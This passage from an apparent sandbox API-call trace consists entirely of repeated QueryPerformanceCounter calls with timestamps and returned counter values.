lpPerformanceCount=0x6adfdfc*=3095434055817) returned 1 [0135.522] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095434078464) returned 1 [0135.538] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095435664104) returned 1 [0135.538] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095435688486) returned 1 [0135.554] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095437266225) returned 1 [0135.554] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095437292199) returned 1 [0135.570] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095438862254) returned 1 [0135.570] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095438883273) returned 1 [0135.585] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095440453666) returned 1 [0135.586] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095440471097) returned 1 [0135.602] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095442080254) returned 1 [0135.602] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095442099218) returned 1 [0135.617] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095443652660) returned 1 [0135.618] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095443672708) returned 1 [0135.634] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095445325436) returned 1 [0135.634] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095445348432) returned 1 [0135.650] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095446912425) returned 1 [0135.650] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095446929882) returned 1 [0135.666] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095448467621) returned 1 [0135.666] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095448484904) returned 1 [0135.681] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095450053351) returned 1 [0135.682] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095450072809) returned 1 [0135.697] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095451620264) returned 1 [0135.697] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095451651167) returned 1 [0135.713] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095453225923) returned 1 [0135.713] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095453249278) returned 1 [0135.729] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095454830129) returned 1 [0135.730] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095454857245) returned 1 [0135.747] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095456637387) returned 1 [0135.747] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095456654382) returned 1 [0135.764] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095458255252) returned 1 [0135.764] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095458270657) returned 1 [0135.779] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095459819148) returned 1 [0135.779] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095459837080) returned 1 [0135.795] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095461423081) returned 1 [0135.795] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095461445720) returned 1 [0135.812] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095463105804) returned 1 [0135.812] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095463145299) returned 1 [0135.830] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095464871737) returned 1 [0135.830] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095464901212) returned 1 [0135.845] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095466450213) returned 1 [0135.846] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095466467262) returned 1 [0135.861] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095468052068) returned 1 [0135.862] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095468078396) returned 1 [0135.877] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095469651563) returned 1 [0135.878] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095469682770) returned 1 [0135.893] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095471243926) returned 1 [0135.894] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095471258327) returned 1 [0135.916] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095473527708) returned 1 [0135.916] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095473542331) returned 1 [0135.925] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095474425166) returned 1 [0135.925] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095474439051) returned 1 [0135.941] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095476019433) returned 1 [0135.941] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095476033708) returned 1 [0135.958] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095477654934) returned 1 [0135.958] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095477667741) returned 1 [0135.973] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095479231198) returned 1 [0135.973] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095479253886) returned 1 [0135.989] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095480829058) returned 1 [0135.989] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095480847497) returned 1 [0136.005] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095482431735) returned 1 [0136.005] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095482454126) returned 1 [0136.021] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095484033726) returned 1 [0136.022] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095484056965) returned 1 [0136.037] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095485623882) returned 1 [0136.037] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095485638363) returned 1 [0136.053] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095487244613) returned 1 [0136.054] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095487261747) returned 1 [0136.069] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095488822741) returned 1 [0136.069] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095488838261) returned 1 [0136.087] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095490627255) returned 1 [0136.087] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095490644456) returned 1 [0136.106] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095492484892) returned 1 [0136.106] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095492506287) returned 1 [0136.122] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095494092726) returned 1 [0136.122] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095494117975) returned 1 [0136.140] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095495865376) returned 1 [0136.140] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095495884130) returned 1 [0136.155] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095497379891) returned 1 [0136.155] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095497407038) returned 1 [0136.171] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095498986847) returned 1 [0136.171] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095499031687) returned 1 [0136.187] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095500610385) returned 1 [0136.187] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095500627293) returned 1 [0136.203] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095502189133) returned 1 [0136.203] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095502213045) returned 1 [0136.219] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095503786771) returned 1 [0136.219] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095503807901) returned 1 [0136.235] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095505387307) returned 1 [0136.235] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095505408687) returned 1 [0136.251] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095506976573) returned 1 [0136.251] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095506997122) returned 1 [0136.267] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095508596270) returned 1 [0136.267] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095508627878) returned 1 [0136.283] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095510212622) returned 1 [0136.283] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095510231194) returned 1 [0136.299] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095511792630) returned 1 [0136.299] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095511809875) returned 1 [0136.323] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095514217085) returned 1 [0136.323] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095514235456) returned 1 [0136.333] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095515250367) returned 1 [0136.334] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095515263049) returned 1 [0136.349] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095516840769) returned 1 [0136.350] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095516854408) returned 1 [0136.365] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095518446923) returned 1 [0136.366] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095518462770) returned 1 [0136.381] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095520047026) returned 1 [0136.382] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095520061652) returned 1 [0136.397] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095521651222) returned 1 [0136.398] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095521666549) returned 1 [0136.413] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095523248325) returned 1 [0136.414] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095523263429) returned 1 [0136.446] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095526460893) returned 1 [0136.446] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095526497225) returned 1 [0136.447] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095526591931) returned 1 [0136.447] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095526608266) returned 1 [0136.461] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095528005438) returned 1 [0136.461] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095528020015) returned 1 [0136.477] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095529576821) returned 1 [0136.477] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095529599919) returned 1 [0136.493] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095531157889) returned 1 [0136.493] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095531179686) returned 1 [0136.509] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095532851472) returned 1 [0136.510] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095532865340) returned 1 [0136.525] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095534357256) returned 1 [0136.525] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095534370534) returned 1 [0136.540] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095535952389) returned 1 [0136.541] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095535965778) returned 1 [0136.556] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095537550748) returned 1 [0136.557] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095537563656) returned 1 [0136.572] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095539139554) returned 1 [0136.572] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095539151340) returned 1 [0136.589] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095540782108) returned 1 [0136.589] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095540803104) returned 1 [0136.605] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095542356559) returned 1 [0136.605] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095542373613) returned 1 [0136.649] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095546799309) returned 1 [0136.649] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095546818011) returned 1 [0136.663] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095548211262) returned 1 [0136.663] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095548251137) returned 1 [0136.679] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095549812111) returned 1 [0136.679] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095549834469) returned 1 [0136.695] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095551387922) returned 1 [0136.695] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095551413401) returned 1 [0136.711] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095552981929) returned 1 [0136.711] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095553000641) returned 1 [0136.727] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095554667321) returned 1 [0136.728] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095554693668) returned 1 [0136.743] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095556182466) returned 1 [0136.743] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095556201309) returned 1 [0136.759] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095557787956) returned 1 [0136.759] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095557809825) returned 1 [0136.775] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095559397591) returned 1 [0136.775] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095559447306) returned 1 [0136.791] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095560979604) returned 1 [0136.791] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095560994517) returned 1 [0136.807] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095562583802) returned 1 [0136.807] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095562606438) returned 1 [0136.823] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095564206688) returned 1 [0136.823] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095564224567) returned 1 [0136.839] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095565773124) returned 1 [0136.839] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095565790310) returned 1 [0136.855] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095567378361) returned 1 [0136.855] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095567393189) returned 1 [0136.871] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095568979567) returned 1 [0136.871] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095568994585) returned 1 [0136.887] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095570583351) returned 1 [0136.887] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095570599716) returned 1 [0136.903] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095572176287) returned 1 [0136.903] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095572194952) returned 1 [0136.919] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095573779260) returned 1 [0136.919] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095573835118) returned 1 [0136.935] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095575388866) returned 1 [0136.935] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095575410303) returned 1 [0136.953] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095577217289) returned 1 [0136.953] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095577234192) returned 1 [0136.967] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095578587774) returned 1 [0136.967] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095578612682) returned 1 [0137.000] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095581864055) returned 1 [0137.000] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095581882815) returned 1 [0137.015] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095583416944) returned 1 [0137.015] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095583432865) returned 1 [0137.030] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095584930829) returned 1 [0137.030] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095584948790) returned 1 [0137.047] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095586569426) returned 1 [0137.047] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095586588285) returned 1 [0137.062] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095588130220) returned 1 [0137.062] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095588158652) returned 1 [0137.078] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095589846154) returned 1 [0137.080] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095589888495) returned 1 [0137.094] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095591265263) returned 1 [0137.094] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095591283565) returned 1 [0137.109] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095592850083) returned 1 [0137.110] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095592870998) returned 1 [0137.125] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095594417765) returned 1 [0137.125] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095594443353) returned 1 [0137.141] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095596016427) returned 1 [0137.141] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095596039607) returned 1 [0137.157] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095597620807) returned 1 [0137.157] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095597644589) returned 1 [0137.173] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095599211409) returned 1 [0137.173] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095599230320) returned 1 [0137.189] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095600814381) returned 1 [0137.189] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095600830293) returned 1 [0137.205] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095602388027) returned 1 [0137.205] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095602404937) returned 1 [0137.222] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095604086191) returned 1 [0137.222] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: lpPerformanceCount=0x6adfdfc*=3095604103304) returned 1 [0137.238] QueryPerformanceCounter (in: lpPerformanceCount=0x6adfdfc | out: 